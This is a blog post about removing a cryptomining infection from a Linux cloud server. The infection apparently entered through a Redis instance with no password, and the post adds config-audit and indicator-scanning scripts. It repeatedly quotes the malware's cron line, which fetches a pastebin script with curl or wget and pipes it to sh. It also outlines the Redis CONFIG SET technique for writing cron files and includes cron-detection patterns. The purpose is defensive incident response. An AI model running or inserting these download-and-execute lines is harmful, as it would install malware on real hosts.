Killing a Linux mining virus, March 2019

Since February 17 I have been receiving alarm messages from Alibaba Cloud:

Your cloud server (120.78.158.127) was detected launching outbound attacks. Its access to port TCP:3389 on other servers has been blocked; the block is expected to end at 2019-03-19 11:46:21. Please perform a security self-check promptly. If you have questions, contact Alibaba Cloud after-sales support by ticket or phone. Thank you for supporting Alibaba Cloud.


Listing the scheduled tasks with crontab -l turned up this entry:
*/15 * * * * (curl -fsSL https://pastebin.com/raw/yPRSa0ki||wget -q -O- https://pastebin.com/raw/yPRSa0ki)|sh
Obviously a miner's loader: every 15 minutes it fetches a script from pastebin and pipes it straight into sh.

Redis also had a key under Cache whose value was the same string: */15 * * * * (curl -fsSL https://pastebin.com/raw/yPRSa0ki||wget -q -O- https://pastebin.com/raw/yPRSa0ki)|sh

So I believe the cause was that my Redis had no password set. Exactly how the intrusion came in through Redis I do not know yet; I will look into it later.
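A cron line that sits both in a Redis key and in root's crontab is the classic footprint of an unauthenticated Redis being used as a file writer: a client runs CONFIG SET dir /var/spool/cron and CONFIG SET dbfilename root, stores the cron line in a key, and issues SAVE, so Redis writes its dump file (key value included) where crond picks it up. The script below is an added example, not code from the post; it audits a redis.conf for the settings that make this possible and also flags a dir/dbfilename that has already been repointed. The function names and the two sample configs are my own, and the samples are constructed for the demo.

```shell
#!/bin/sh
# Added example, not from the original post: audit a redis.conf for the settings that let an
# anonymous client turn Redis into a file writer. Names (redis_directive, audit_redis_conf,
# write_sample_confs) and the two sample configs are my own; the samples are constructed.

# Print the value of the last occurrence of directive $2 in conf file $1 (comments stripped;
# a '#' inside a quoted value is not handled).
redis_directive() {
  sed -e 's/#.*//' "$1" | awk -v k="$2" '$1 == k { $1 = ""; sub(/^ +/, ""); v = $0 } END { print v }'
}

# Print one finding per line; prints nothing for a hardened configuration.
audit_redis_conf() {
  conf="$1"

  # 1. No password: every command, including CONFIG SET, is open to whoever reaches the port.
  [ -n "$(redis_directive "$conf" requirepass)" ] ||
    echo "requirepass missing: any client that reaches the port can run any command"

  # 2. Listening on all interfaces (an absent bind means all interfaces in Redis).
  bind=$(redis_directive "$conf" bind)
  case "$bind" in
    ""|*0.0.0.0*) echo "bind '$bind': Redis listens on all interfaces" ;;
  esac

  # 3. protected-mode no switches off the last safety net of a passwordless, unbound instance.
  [ "$(redis_directive "$conf" protected-mode)" != "no" ] ||
    echo "protected-mode no: remote clients are accepted without authentication"

  # 4. CONFIG is the command that repoints dir/dbfilename; rename it (or disable it with "").
  if ! sed -e 's/#.*//' "$conf" |
       awk '$1 == "rename-command" && toupper($2) == "CONFIG" { found = 1 } END { exit !found }'; then
    echo "CONFIG command not renamed: CONFIG SET dir/dbfilename is reachable"
  fi

  # 5./6. A dump path already pointing at a cron spool or an ssh directory means the box is owned.
  dir=$(redis_directive "$conf" dir)
  case "$dir" in
    /var/spool/cron*|/etc/cron*|*/.ssh*) echo "dir '$dir': dump directory is a cron or ssh location (tampered?)" ;;
  esac
  dbf=$(redis_directive "$conf" dbfilename)
  case "$dbf" in
    ""|*.rdb) ;;
    *) echo "dbfilename '$dbf': dump file is not an .rdb (tampered?)" ;;
  esac
}

# Write a deliberately weak config and a hardened one into directory $1 (constructed samples).
write_sample_confs() {
  cat > "$1/weak.conf" <<'EOF'
# constructed: an exposed instance after its dump path has been repointed at the cron spool
port 6379
bind 0.0.0.0
protected-mode no
dir /var/spool/cron
dbfilename root
EOF
  cat > "$1/hardened.conf" <<'EOF'
# constructed: the same instance after hardening
port 6379
bind 127.0.0.1
protected-mode yes
requirepass replace-with-a-long-random-secret
rename-command CONFIG ""
dir /var/lib/redis
dbfilename dump.rdb
EOF
}

# Demo: run the audit over both samples.
sample_dir=$(mktemp -d)
write_sample_confs "$sample_dir"
for c in weak hardened; do
  echo "== $c.conf =="
  audit_redis_conf "$sample_dir/$c.conf"
done
rm -rf "$sample_dir"
```

The file audit has one blind spot worth knowing: CONFIG SET changes the running server, not the file, so on a live instance also run redis-cli CONFIG GET dir and CONFIG GET dbfilename and compare them with what the file says.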

Deleting the entry with sed -i did not stick. It is stubborn: some script keeps running echo "*/15 * * * * (curl -fsSL https://pastebin.com/raw/yPRSa0ki||wget -q -O- https://pastebin.com/raw/yPRSa0ki)|sh" >> /var/spool/cron/root, so the line comes straight back.

Only busybox top gave a process list that had not been tampered with: the normal tools load the hijacked shared library through /etc/ld.so.preload, which hides the miner from them, whereas a statically linked busybox never loads it.

Cleanup steps:

# First stop crond, so the script is not downloaded again while we clean up
service crond stop

# Remove the preloaded libcset.so hijack that hides the virus

# Kill the abnormal processes

# Kill them again

# Remove the boot-time startup entries

Combined cleanup script for ksoftirqds, kthrotlds, kpsmouseds and kintegrityds:

service crond stop

# Remove the preloaded hijack library. The preload file carries the immutable attribute,
# so clear it with chattr -i first; otherwise the rm fails.
chattr -i /etc/ld.so.preload
busybox rm -f /etc/ld.so.preload
busybox rm -f /usr/local/lib/libcset.so

# Kill the abnormal processes (busybox ps prints the PID in column 1, unlike ps -ef where column 1 is the UID)
busybox ps -ef | busybox grep -v grep | busybox egrep 'ksoftirqds' | busybox awk '{print $1}' | busybox xargs kill -9
busybox ps -ef | busybox grep -v grep | busybox egrep 'kthrotlds' | busybox awk '{print $1}' | busybox xargs kill -9
busybox ps -ef | busybox grep -v grep | busybox egrep 'kpsmouseds' | busybox awk '{print $1}' | busybox xargs kill -9
busybox ps -ef | busybox grep -v grep | busybox egrep 'kintegrityds' | busybox awk '{print $1}' | busybox xargs kill -9

# Remove the dropped binaries, cron files and init scripts
busybox rm -f /tmp/kthrotlds
busybox rm -f /tmp/kintegrityds
busybox rm -f /tmp/kpsmouseds
busybox rm -f /etc/cron.d/tomcat
busybox rm -f /etc/cron.d/root
busybox rm -f /var/spool/cron/root
busybox rm -f /var/spool/cron/crontabs/root
busybox rm -f /etc/rc.d/init.d/kthrotlds
busybox rm -f /etc/rc.d/init.d/kpsmouseds
busybox rm -f /etc/rc.d/init.d/kintegrityds
busybox rm -f /usr/sbin/kthrotlds
busybox rm -f /usr/sbin/kintegrityds
busybox rm -f /usr/sbin/kpsmouseds
busybox rm -f /etc/init.d/netdns


# Rebuild the dynamic linker cache now that the preload file is gone
ldconfig

# Kill the abnormal processes again, in case any respawned or were still hidden during the first pass
busybox ps -ef | busybox grep -v grep | busybox egrep 'ksoftirqds' | busybox awk '{print $1}' | busybox xargs kill -9
busybox ps -ef | busybox grep -v grep | busybox egrep 'kthrotlds' | busybox awk '{print $1}' | busybox xargs kill -9
busybox ps -ef | busybox grep -v grep | busybox egrep 'kpsmouseds' | busybox awk '{print $1}' | busybox xargs kill -9
busybox ps -ef | busybox grep -v grep | busybox egrep 'kintegrityds' | busybox awk '{print $1}' | busybox xargs kill -9

# Remove the boot-time startup entry
chkconfig netdns off
chkconfig --del netdns

service crond start
echo "Done, Please reboot!"


# sidie@moresec

For a detailed analysis of the cleanup procedure see: https://www.anquanke.com/post/id/172111
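The cleanup script above removes a fixed list of paths and relies on busybox because the preloaded library filters what the normal tools report. The script below is an added example, not code from the post or from the moresec author: it checks for the same indicators (the preload file, the dropped binaries and init scripts, and crontab lines that pipe a download into a shell) under an optional root prefix so it can also be run against a mounted disk image, and it includes a check comparing the process list from busybox with the one from ps. The function names, the sample tree and the constructed cron lines are mine; the demo at the bottom scans that constructed tree, not the live system.

```shell
#!/bin/sh
# Added example, not from the original post: look for the persistence artefacts described
# above under an optional root prefix ("" = live system, "/mnt/image" = mounted copy).
# Function names, the sample tree and the constructed cron lines are my own.

# Paths the cleanup script above removes; their mere presence is an indicator.
IOC_PATHS="/etc/ld.so.preload /usr/local/lib/libcset.so
/tmp/kthrotlds /tmp/kintegrityds /tmp/kpsmouseds
/usr/sbin/kthrotlds /usr/sbin/kintegrityds /usr/sbin/kpsmouseds
/etc/rc.d/init.d/kthrotlds /etc/rc.d/init.d/kpsmouseds /etc/rc.d/init.d/kintegrityds
/etc/init.d/netdns /etc/cron.d/tomcat /etc/cron.d/root"

# Crontabs to grep, plus everything in /etc/cron.d.
CRON_FILES="/var/spool/cron/root /var/spool/cron/crontabs/root /etc/crontab"

# Cron entries that download something and pipe it into a shell, or pull from pastebin.
CRON_PATTERN='(curl|wget)[^|]*\|[[:space:]]*(ba)?sh|pastebin\.com/raw'

# scan_miner_iocs [ROOT]: prints one line per hit and a final "TOTAL   n" line.
scan_miner_iocs() {
  root="${1:-}"
  hits=0

  for p in $IOC_PATHS; do
    if [ -e "$root$p" ]; then
      echo "FILE    $p"
      hits=$((hits + 1))
    fi
  done

  # The preload file is the hiding mechanism: show what it loads and whether it is immutable.
  if [ -s "$root/etc/ld.so.preload" ]; then
    sed 's/^/PRELOAD /' "$root/etc/ld.so.preload"
    if command -v lsattr >/dev/null 2>&1; then
      lsattr "$root/etc/ld.so.preload" 2>/dev/null | sed 's/^/ATTR    /'
    fi
  fi

  for f in $(for c in $CRON_FILES; do echo "$root$c"; done) "$root"/etc/cron.d/*; do
    [ -f "$f" ] || continue
    n=$(grep -cE "$CRON_PATTERN" "$f" 2>/dev/null || true)
    if [ "${n:-0}" -gt 0 ]; then
      grep -nE "$CRON_PATTERN" "$f" | sed "s|^|CRON    ${f#$root}:|"
      hits=$((hits + n))
    fi
  done

  echo "TOTAL   $hits"
}

# hidden_pids: PIDs that busybox ps sees but the dynamically linked ps does not. Live system
# only, and only meaningful if busybox is statically linked (file "$(command -v busybox)"
# should say "statically linked"); a dynamic busybox loads /etc/ld.so.preload as well.
# Short-lived processes that exit between the two snapshots show up as false positives.
hidden_pids() {
  command -v busybox >/dev/null 2>&1 || { echo "busybox not installed" >&2; return 0; }
  t=$(mktemp -d)
  busybox ps | busybox awk 'NR > 1 { print $1 }' | LC_ALL=C sort > "$t/bb"
  ps -e -o pid= | awk '{ print $1 }' | LC_ALL=C sort > "$t/sys"
  comm -23 "$t/bb" "$t/sys"
  rm -rf "$t"
}

# Constructed sample tree reproducing this post's indicators (for the demo, not a real infection).
make_sample_tree() {
  mkdir -p "$1/etc/cron.d" "$1/var/spool/cron" "$1/tmp" "$1/usr/local/lib"
  echo "/usr/local/lib/libcset.so" > "$1/etc/ld.so.preload"
  : > "$1/tmp/kthrotlds"
  cron='*/15 * * * * (curl -fsSL https://pastebin.com/raw/yPRSa0ki||wget -q -O- https://pastebin.com/raw/yPRSa0ki)|sh'
  echo "$cron" > "$1/var/spool/cron/root"
  printf '%s\n%s\n' "# harmless entry" "0 3 * * * root /usr/sbin/logrotate /etc/logrotate.conf" > "$1/etc/cron.d/logrotate"
  echo "$cron" > "$1/etc/cron.d/tomcat"
}

# Demo: scan the constructed tree (expect 3 FILE hits and 2 CRON hits).
demo=$(mktemp -d)
make_sample_tree "$demo"
scan_miner_iocs "$demo"
rm -rf "$demo"
```

Run scan_miner_iocs with no argument on the suspect host, or scan_miner_iocs /mnt/disk against a mounted image, and hidden_pids on the live host before the preload file is removed. Treat the path list as a first pass only: it is the set from this incident, and a later variant can use other names, so the cron and preload checks are the ones that generalise.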


posted on 2019-03-19 10:13 by 酒夜狸, 3660 reads, 0 comments
